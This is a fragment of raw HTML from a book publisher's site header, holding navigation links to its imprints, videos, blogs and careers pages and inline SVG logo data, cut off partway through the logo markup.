</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/basic-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Basic Books">Basic Books</a><span id="expand-site-header__sub-menu-1916817898" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1916817898" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1916817898" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1009027975  desc-arrow-3799977445">
	<title id="titlet-arrow-1009027975">Arrow Icon</title>
	<desc id="desc-arrow-3799977445">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Books">Hachette Books</a><span id="expand-site-header__sub-menu-1704149886" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1704149886" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1704149886" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-269458947  desc-arrow-2770965238">
	<title id="titlet-arrow-269458947">Arrow Icon</title>
	<desc id="desc-arrow-2770965238">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="PublicAffairs">PublicAffairs</a><span id="expand-site-header__sub-menu-176034369" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-176034369" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-176034369" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1566744896  desc-arrow-928471091">
	<title id="titlet-arrow-1566744896">Arrow Icon</title>
	<desc id="desc-arrow-928471091">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Running Press">Running Press</a><span id="expand-site-header__sub-menu-779015773" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-779015773" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-779015773" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1595126337  desc-arrow-2942808242">
	<title id="titlet-arrow-1595126337">Arrow Icon</title>
	<desc id="desc-arrow-2942808242">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li>	</ul>
</li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Videos">Videos</a><span id="expand-site-header__sub-menu-1780672866" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1780672866" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1780672866" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2413810653  desc-arrow-1629761929">
	<title id="titlet-arrow-2413810653">Arrow Icon</title>
	<desc id="desc-arrow-1629761929">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1780672866" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1780672866"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-inquiry/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Inquiry">Author Inquiry</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/book-trailers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Trailers">Book Trailers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/landing-page/meet-the-author-video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet the Author">Meet the Author</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/landing-page/wordsmithing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wordsmithing">Wordsmithing</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bold-recommendations/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Recommendations">Bold Recommendations</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/book-your-next-romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Your Next Romance">Book Your Next Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/shelf-life/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Shelf Life">Shelf Life</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/hbg-films/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Films">HBG Films</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/landing-page/recommendations-from-the-african-diaspora/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Recommendations from the African Diaspora">Recommendations from the African Diaspora</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/blogs-hub" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Blogs">Blogs</a><span id="expand-site-header__sub-menu-1098992275" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1098992275" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1098992275" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3557641787  desc-arrow-3506466362">
	<title id="titlet-arrow-3557641787">Arrow Icon</title>
	<desc id="desc-arrow-3506466362">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1098992275" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1098992275"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.novelsuspects.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Novel Suspects">Novel Suspects</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/open-book/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Open Book">Open Book</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About">About</a><span id="expand-site-header__sub-menu-1839120355" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1839120355" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1839120355" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1118482077  desc-arrow-1532524261">
	<title id="titlet-arrow-1118482077">Arrow Icon</title>
	<desc id="desc-arrow-1532524261">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1839120355" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1839120355"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About Hachette Book Group">About Hachette Book Group</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/about/careers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Careers">Careers</a></span></li></ul>
</li></ul></div>	</nav>
</header>

<header id="site-header" class="site-header imprint-header little-brown-and-company">
	
<div class="site-header__top site-header__default" data-toggle-element="site-header__search">
	<div class="site-header__mobile-menu-toggle">
		<button class="site-header__hamburger toggleable" data-toggle-target="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu">&#9776;</button>
	</div>

	<h2 class="site-header__branding">
		
	<a class="site-header__branding--imprint-header-logo__desktop" href="https://www.littlebrown.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 288 98.1"><defs><style>.cls-1{fill:#aa7f44;}.cls-2{fill:#2e2e2f;}.cls-3{fill:#fff;}</style></defs><title>little-brown</title><path class="cls-1" d="M193.18,34.64c0,18.83-15,34.09-33.48,34.09s-33.49-15.26-33.49-34.09,15-34,33.49-34,33.48,15.22,33.48,34m-74.1,0c0,18.83-15,34.09-33.48,34.09S52.11,53.47,52.11,34.64,67.09.6,85.6.6s33.48,15.22,33.48,34"/><path class="cls-2" d="M113.19,34.64a27.6,27.6,0,1,1-55.19,0,27.6,27.6,0,1,1,55.19,0m74.11,0a27.6,27.6,0,1,1-55.2,0,27.6,27.6,0,1,1,55.2,0"/><path class="cls-3" d="M99.34,50.87c-.16.72-.49.88-.93.88-2.6,0-16.14-.16-19.5-.16L73,51.83V48.62c0-.4.24-.48.56-.48.64,0,4.25.08,5.73-.08a29.27,29.27,0,0,0,.16-3V23a27.52,27.52,0,0,0-.16-3c-1.48-.16-5-.16-5.73-.16-.32,0-.56-.08-.56-.48v-3c1.64.08,7.69.16,8.85.16s6.57-.08,8.25-.16v3c0,.4-.24.48-.56.48-.64,0-4,0-5.49.16a16.37,16.37,0,0,0-.16,3V44.26a31.57,31.57,0,0,0,.16,3.52,34.36,34.36,0,0,0,3.53.16h8.25L97,39.17l3.37.32c.32.08.24.4.24.72L99.34,50.87ZM161.5,35h-4.69v8.7a15.49,15.49,0,0,0,.48,3.92A29.26,29.26,0,0,0,163,48c4.17,0,7.53-1.64,7.53-6-.12-5-4.12-7-9.05-7m4.17-14a7.76,7.76,0,0,0-4.57-1.16,29.13,29.13,0,0,0-4.33.4v11c.89.08,3.61.16,4.61.16a6,6,0,0,0,6.37-6.21A4.94,4.94,0,0,0,165.67,21m-2.61,30.69c-2.12,0-6.37-.16-8.53-.16s-7.29.08-8.29.16v-3c0-.4.24-.48.56-.48.72,0,3.77,0,5.25-.16a16.25,16.25,0,0,0,.16-3V23.19a26.35,26.35,0,0,0-.24-3.13c-1.16-.08-4.69-.16-5.17-.16-.32,0-.56-.08-.56-.4V16.38c1,.08,6.37.16,7.77.16s5.57-.16,6.89-.16c4.69,0,6.49.72,8.45,2a8,8,0,0,1,3.13,6.21A8.22,8.22,0,0,1,166.19,33c6.29.72,8.85,5.09,8.85,9.09,0,6.57-5.21,9.58-12,9.58"/><path class="cls-2" d="M0,95.81A54.09,54.09,0,0,0,0,85.63a10.86,10.86,0,0,0,2.28,0A73.85,73.85,0,0,0,2.2,94a22.06,22.06,0,0,0,4.41-.24,5.89,5.89,0,0,0,.08,2C4.17,95.73,2.2,95.73,0,95.81Zm10.65-.08a11.63,11.63,0,0,0-2.36,0,60.19,60.19,0,0,0,0-10.06,6.26,6.26,0,0,0,2.44,0A52.84,52.84,0,0,0,10.65,95.73Zm7.61-8.41c-.08,1.48-.08,2.8-.08,4.16a40.07,40.07,0,0,0,.25,4.25,11.73,11.73,0,0,0-2.37,0c.08-1.49.16-3,.16-4.41s0-2.76-.08-4.08c-.88,0-2.52.08-3.36.08a6.27,6.27,0,0,0,0-1.73c1.56.08,3,.08,4.4.08s2.89,0,4.57-.08a6.27,6.27,0,0,0,0,1.73Zm10.42,0c-.08,1.48-.08,2.8-.08,4.16s.08,2.68.24,4.25a11.63,11.63,0,0,0-2.36,0,41.09,41.09,0,0,0,.16-4.41c0-1.4,0-2.76-.08-4.08-.88,0-2.53.08-3.37.08a6.27,6.27,0,0,0,0-1.73c1.56.08,3,.08,4.41.08s2.88,0,4.56-.08a6.27,6.27,0,0,0,0,1.73Zm5.65,8.49a54.09,54.09,0,0,0,0-10.18,10.86,10.86,0,0,0,2.28,0A73.85,73.85,0,0,0,36.53,94a22.09,22.09,0,0,0,4.41-.24,5.89,5.89,0,0,0,.08,2C38.41,95.73,36.53,95.73,34.33,95.81Zm8.41,0c.16-1.81.24-3.45.24-5.17s-.08-3.28-.24-5a23.53,23.53,0,0,0,5.81,0,8.12,8.12,0,0,0,0,2,29,29,0,0,0-3.69-.08v2.2a21.13,21.13,0,0,0,3.29-.16,8,8,0,0,0,0,2,25.65,25.65,0,0,0-3.29-.16c0,.92,0,1.64.08,2.68a22.73,22.73,0,0,0,3.93-.16,4.1,4.1,0,0,0,0,2A44.88,44.88,0,0,0,42.74,95.81Zm9,2.24a2,2,0,0,0-.92-.56,26.52,26.52,0,0,0,.92-3.21c.08-.32.24-.4.64-.4s1,.73,1,.93-1.12,2.32-1.64,3.24Zm11.66-2.16c-.64,0-2.21-.16-2.89-.24.16-1.81.24-3.29.24-4.77s-.08-3.12-.24-5a22.33,22.33,0,0,1,2.77-.24c1.72,0,3.68.48,3.68,2.77a2.66,2.66,0,0,1-1.72,2.12,2.72,2.72,0,0,1,2.2,2.36c-.12,2.29-2.08,3-4,3Zm-.16-4.65h-.72v1.4a9.18,9.18,0,0,0,.08,1.48,3.74,3.74,0,0,0,.92.08c.88,0,1.88-.32,1.88-1.56C65.45,91.8,64.53,91.24,63.25,91.24Zm0-4.17h-.56c0,.49-.08.93-.08,1.33v1.24h.56c.92,0,1.64-.4,1.64-1.32s-.68-1.25-1.56-1.25ZM76,96.17c-.56-.72-1-1.4-1.48-2.13a15.47,15.47,0,0,0-1.8-2.2h-.88a25.9,25.9,0,0,0,.24,4,11.63,11.63,0,0,0-2.36,0,57.51,57.51,0,0,0,0-9.82,11,11,0,0,1,2.88-.48c1.88,0,3.6.92,3.6,3a3.35,3.35,0,0,1-1.64,2.68c.48.64.92,1.16,1.48,1.8s1.17,1.24,1.89,2A8.47,8.47,0,0,0,76,96.17Zm-2.24-8.69a1.56,1.56,0,0,0-1.08-.41,2,2,0,0,0-.72.08v3h.32c1.24,0,2-.56,2-1.72A2.59,2.59,0,0,0,73.78,87.48Zm10.41,8.41a5.13,5.13,0,1,1,5.25-5.09A5.24,5.24,0,0,1,84.19,95.89Zm0-8.65a3.15,3.15,0,0,0-3.12,3.44,3.2,3.2,0,0,0,3.12,3.44,3.46,3.46,0,0,0,0-6.88Zm18.27,8.49a7.36,7.36,0,0,0-1.88,0,63.23,63.23,0,0,0-2.53-7.37c-.88,2.28-1.72,4.76-2.52,7.29a7.39,7.39,0,0,0-1.88,0,92.14,92.14,0,0,0-2.81-9.82,6.74,6.74,0,0,0,2.37-.56,50.63,50.63,0,0,0,1.64,7.45,44.57,44.57,0,0,0,2.2-7,5.2,5.2,0,0,0,2.21-.16,66.35,66.35,0,0,0,2.2,7.21,73.35,73.35,0,0,0,1.64-7.29,5.55,5.55,0,0,0,2.28.48,91.32,91.32,0,0,0-2.92,9.82Zm14.5-.08a3.68,3.68,0,0,0-1.8.4,75,75,0,0,0-5.57-7,49.44,49.44,0,0,0,.16,6.89,5.1,5.1,0,0,0-2.2,0,86.91,86.91,0,0,0,.24-10.18,5.38,5.38,0,0,0,2,0,80.46,80.46,0,0,0,5.41,7.13,43.5,43.5,0,0,0-.24-7.21,5.1,5.1,0,0,0,2.2,0A82.81,82.81,0,0,0,117,95.65Zm14.9.44a20.37,20.37,0,0,0-1-2.81,32.21,32.21,0,0,0-3.93,0,20.37,20.37,0,0,0-1,2.81,8.94,8.94,0,0,0-2.2-.8,83.26,83.26,0,0,0,4-9.82,4.78,4.78,0,0,0,2.13,0c1.16,2.89,2.68,6.81,4,9.82C133.34,95.49,132.5,95.81,131.86,96.09ZM129,88c-.48,1-1,2.88-1.41,3.84a16,16,0,0,0,2.77,0C130,90.76,129.42,89,129,88Zm16.78,7.69a3.68,3.68,0,0,0-1.8.4,75,75,0,0,0-5.57-7,49.44,49.44,0,0,0,.16,6.89,5.1,5.1,0,0,0-2.2,0,86.91,86.91,0,0,0,.24-10.18,5.38,5.38,0,0,0,2,0A80.46,80.46,0,0,0,144,92.84a43.5,43.5,0,0,0-.24-7.21,5.1,5.1,0,0,0,2.2,0A82.81,82.81,0,0,0,145.76,95.65Zm6.57.24a13.65,13.65,0,0,1-3.37-.48c.08-1.41.16-3,.16-4.69a38.29,38.29,0,0,0-.16-4.57,11,11,0,0,1,3.77-.64c3.12,0,5.81,1.48,5.81,5S155.69,95.89,152.33,95.89Zm.4-8.65a10.36,10.36,0,0,0-1.64.16c-.08,1.16-.08,2.36-.08,3.44s0,2.12.08,3.2a7.54,7.54,0,0,0,1.32.08c2.44,0,4-1.24,4-3.68,0-2-1.64-3.2-3.68-3.2Zm20.79,1.2a3.85,3.85,0,0,0-2.77-1.16,3.28,3.28,0,0,0-3.28,3.44A3.38,3.38,0,0,0,171,94.16a4.2,4.2,0,0,0,2.53-.92,3.58,3.58,0,0,0,.88,1.49A6.13,6.13,0,0,1,171,95.81c-3.36,0-5.56-2-5.56-5.17s2.44-5.09,5.48-5.09a5.87,5.87,0,0,1,3.61,1.24,2.51,2.51,0,0,0-1,1.65Zm7.57,7.45a5.13,5.13,0,1,1,5.24-5.09,5.24,5.24,0,0,1-5.24,5.09Zm0-8.65A3.15,3.15,0,0,0,178,90.68a3.21,3.21,0,0,0,3.13,3.44,3.16,3.16,0,0,0,3.12-3.44A3.12,3.12,0,0,0,181.09,87.24Zm18,8.65c-.16-2.29-.4-5.09-.64-7.53-.92,2.36-2,5.4-2.6,7.45a8.12,8.12,0,0,0-2,0c-.64-2-1.56-4.85-2.6-7.37-.16,2.52-.4,5.32-.48,7.45a6.18,6.18,0,0,0-2.12-.16c.56-3.21.92-6.89,1.24-10.18a4.11,4.11,0,0,0,2.2,0A76.55,76.55,0,0,0,195,93.48a58.84,58.84,0,0,0,2.6-7.93,4.75,4.75,0,0,0,2.36-.08c.4,3.85.8,6.57,1.32,10.06a19.41,19.41,0,0,0-2.2.36Zm7.57-3.77h-.8a30.65,30.65,0,0,0,.24,3.69,5.86,5.86,0,0,0-2.36,0,59.39,59.39,0,0,0,0-10,17.2,17.2,0,0,1,3-.32c2,0,3.85,1.08,3.85,3.29.12,2-1.85,3.32-3.89,3.32Zm.08-5.05a3.31,3.31,0,0,0-.8.08c0,1.17-.08,2.21-.08,3.29a3,3,0,0,0,.8.08,1.76,1.76,0,0,0,1.88-1.8,1.65,1.65,0,0,0-1.8-1.65Zm12.18,9c-.4-1.24-.64-1.89-1-2.81a32.21,32.21,0,0,0-3.93,0,20.37,20.37,0,0,0-1,2.81,8.94,8.94,0,0,0-2.2-.8,83.26,83.26,0,0,0,4-9.82,4.78,4.78,0,0,0,2.13,0c1.16,2.89,2.68,6.81,4,9.82A17.37,17.37,0,0,0,218.9,96.09ZM216,88c-.48,1-1,2.88-1.4,3.84a16,16,0,0,0,2.77,0A32,32,0,0,0,216,88Zm16.79,7.69a3.68,3.68,0,0,0-1.8.4,75,75,0,0,0-5.57-7,49.44,49.44,0,0,0,.16,6.89,5.14,5.14,0,0,0-2.21,0,84.81,84.81,0,0,0,.25-10.18,5.38,5.38,0,0,0,2,0A80.46,80.46,0,0,0,231,92.84a42.45,42.45,0,0,0-.25-7.21,5.14,5.14,0,0,0,2.21,0A69.17,69.17,0,0,0,232.76,95.65Zm7.93-3.85a34.55,34.55,0,0,0,.08,4,5.47,5.47,0,0,0-2.28,0,34.55,34.55,0,0,0,.08-4,34.75,34.75,0,0,0-3.85-5.65,6.4,6.4,0,0,0,2-.88,35.75,35.75,0,0,0,2.81,4.85,25.69,25.69,0,0,0,2.8-4.85,4.37,4.37,0,0,0,2,.88,48.31,48.31,0,0,0-3.64,5.65Z"/></svg>
	</a>
	<a class="site-header__branding--imprint-header-logo__mobile" href="https://www.littlebrown.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 247 98.1"><defs><style>.lbmobile-cls-1{fill:#aa7f44;}.lbmobile-cls-2{fill:#2e2e2f;}.lbmobile-cls-3{fill:#fff;}</style></defs><title>lb</title><path class="lbmobile-cls-1" d="M193.18,34.64c0,18.83-15,34.09-33.48,34.09s-33.49-15.26-33.49-34.09A33.72,33.72,0,0,1,159.7.64c18.49,0,33.48,15.22,33.48,34m-74.1,0c0,18.83-15,34.09-33.48,34.09S52.11,53.47,52.11,34.64,67.09.6,85.6.6s33.48,15.22,33.48,34"/><path class="lbmobile-cls-2" d="M113.19,34.64a27.6,27.6,0,1,1-55.19,1q0-.52,0-1a27.6,27.6,0,0,1,55.19-1q0,.52,0,1m74.11,0a27.6,27.6,0,0,1-55.2,0v0a27.6,27.6,0,1,1,55.2,0v0"/><path class="lbmobile-cls-3" d="M99.34,50.87c-.16.72-.49.88-.93.88-2.6,0-16.14-.16-19.5-.16L73,51.83V48.62c0-.4.24-.48.56-.48.64,0,4.25.08,5.73-.08.1-1,.16-2,.16-3V23a27.41,27.41,0,0,0-.16-3c-1.48-.16-5-.16-5.73-.16-.32,0-.56-.08-.56-.48v-3c1.64.08,7.69.16,8.85.16s6.57-.08,8.25-.16v3c0,.4-.24.48-.56.48-.64,0-4,0-5.49.16a15.85,15.85,0,0,0-.16,3V44.26a31.78,31.78,0,0,0,.16,3.52,34.61,34.61,0,0,0,3.53.16h8.25L97,39.17l3.37.32c.32.08.24.4.24.72ZM161.5,35h-4.69v8.7a15.25,15.25,0,0,0,.48,3.92A29.53,29.53,0,0,0,163,48c4.17,0,7.53-1.64,7.53-6-.12-5-4.12-7-9.05-7m4.17-14a7.75,7.75,0,0,0-4.57-1.16,29.92,29.92,0,0,0-4.33.4v11c.89.08,3.61.16,4.61.16a6,6,0,0,0,6.36-5.61c0-.2,0-.4,0-.6A5,5,0,0,0,165.67,21m-2.61,30.69c-2.12,0-6.37-.16-8.53-.16s-7.29.08-8.29.16v-3c0-.4.24-.48.56-.48.72,0,3.77,0,5.25-.16a15.85,15.85,0,0,0,.16-3V23.19a27.3,27.3,0,0,0-.24-3.13c-1.16-.08-4.69-.16-5.17-.16-.32,0-.56-.08-.56-.4V16.38c1,.08,6.37.16,7.77.16s5.57-.16,6.89-.16c4.69,0,6.49.72,8.45,2a8,8,0,0,1,3.13,6.21A8.22,8.22,0,0,1,166.19,33c6.29.72,8.85,5.09,8.85,9.09,0,6.57-5.21,9.58-12,9.58"/><path class="lbmobile-cls-2" d="M0,95.81A54.1,54.1,0,0,0,0,85.63a10.86,10.86,0,0,0,2.28,0A75.4,75.4,0,0,0,2.2,94a21.72,21.72,0,0,0,4.41-.24,5.84,5.84,0,0,0,.08,2C4.17,95.73,2.2,95.73,0,95.81Zm10.65-.08a11.63,11.63,0,0,0-2.36,0,60.35,60.35,0,0,0,0-10.06,6.26,6.26,0,0,0,2.44,0A52.83,52.83,0,0,0,10.65,95.73Zm7.61-8.41c-.08,1.48-.08,2.8-.08,4.16a40.22,40.22,0,0,0,.25,4.25,11.73,11.73,0,0,0-2.37,0c.08-1.49.16-3,.16-4.41s0-2.76-.08-4.08c-.88,0-2.52.08-3.36.08a6.27,6.27,0,0,0,0-1.73c1.56.08,3,.08,4.4.08s2.89,0,4.57-.08a6.27,6.27,0,0,0,0,1.73Zm10.42,0c-.08,1.48-.08,2.8-.08,4.16a40.8,40.8,0,0,0,.24,4.25,11.63,11.63,0,0,0-2.36,0,40.63,40.63,0,0,0,.16-4.41c0-1.4,0-2.76-.08-4.08-.88,0-2.53.08-3.37.08a6.27,6.27,0,0,0,0-1.73c1.56.08,3,.08,4.41.08s2.88,0,4.56-.08a6.27,6.27,0,0,0,0,1.73Zm5.65,8.49a54.1,54.1,0,0,0,0-10.18,10.86,10.86,0,0,0,2.28,0A75.4,75.4,0,0,0,36.53,94a21.72,21.72,0,0,0,4.41-.24,5.84,5.84,0,0,0,.08,2C38.41,95.73,36.53,95.73,34.33,95.81Zm8.41,0c.16-1.81.24-3.45.24-5.17s-.08-3.28-.24-5a23.53,23.53,0,0,0,5.81,0,8.36,8.36,0,0,0,0,2,30.31,30.31,0,0,0-3.69-.08v2.2a21.27,21.27,0,0,0,3.29-.16,8.36,8.36,0,0,0,0,2,25.8,25.8,0,0,0-3.29-.16c0,.92,0,1.64.08,2.68A22.44,22.44,0,0,0,48.87,94a4,4,0,0,0,0,2A44.83,44.83,0,0,0,42.74,95.81Zm9,2.24a2,2,0,0,0-.92-.56,27.36,27.36,0,0,0,.92-3.21c.08-.32.24-.4.64-.4s1,.73,1,.93A30.66,30.66,0,0,1,51.74,98.05ZM63.4,95.89c-.64,0-2.21-.16-2.89-.24.16-1.81.24-3.29.24-4.77s-.08-3.12-.24-5a21.42,21.42,0,0,1,2.77-.24c1.72,0,3.68.48,3.68,2.77a2.67,2.67,0,0,1-1.72,2.12,2.73,2.73,0,0,1,2.2,2.36c-.12,2.29-2.08,3-4,3Zm-.16-4.65h-.72v1.4a9.18,9.18,0,0,0,.08,1.48,4,4,0,0,0,.92.08c.88,0,1.88-.32,1.88-1.56,0-.84-.87-1.4-2.15-1.4Zm0-4.17h-.56c0,.49-.08.93-.08,1.33v1.24h.56c.92,0,1.64-.4,1.64-1.32S64.12,87.07,63.24,87.07ZM76,96.17c-.56-.72-1-1.4-1.48-2.13a15.16,15.16,0,0,0-1.8-2.2h-.88a26.77,26.77,0,0,0,.24,4,11.63,11.63,0,0,0-2.36,0,57.51,57.51,0,0,0,0-9.82,10.79,10.79,0,0,1,2.88-.48c1.88,0,3.6.92,3.6,3a3.36,3.36,0,0,1-1.64,2.68c.48.64.92,1.16,1.48,1.8s1.17,1.24,1.89,2A8.57,8.57,0,0,0,76,96.17Zm-2.24-8.69a1.54,1.54,0,0,0-1.08-.41,2,2,0,0,0-.72.08v3h.32c1.24,0,2-.56,2-1.72a2.63,2.63,0,0,0-.5-1Zm10.41,8.41a5.13,5.13,0,1,1,5.25-5.09,5.24,5.24,0,0,1-5.23,5.09Zm0-8.65A3.15,3.15,0,0,0,81,90.41a2.44,2.44,0,0,0,0,.27,3.2,3.2,0,0,0,3,3.43h.17a3.46,3.46,0,0,0,0-6.88Zm18.27,8.49a7.39,7.39,0,0,0-1.88,0A63.41,63.41,0,0,0,98,88.36c-.88,2.28-1.72,4.76-2.52,7.29a7.39,7.39,0,0,0-1.88,0,90.82,90.82,0,0,0-2.81-9.82,6.68,6.68,0,0,0,2.37-.56,51.31,51.31,0,0,0,1.64,7.45,45.11,45.11,0,0,0,2.2-7,5.16,5.16,0,0,0,2.21-.16,67.32,67.32,0,0,0,2.2,7.21,72.44,72.44,0,0,0,1.64-7.29,5.59,5.59,0,0,0,2.28.48,90.71,90.71,0,0,0-2.92,9.82Zm14.5-.08a3.76,3.76,0,0,0-1.8.4,76.66,76.66,0,0,0-5.57-7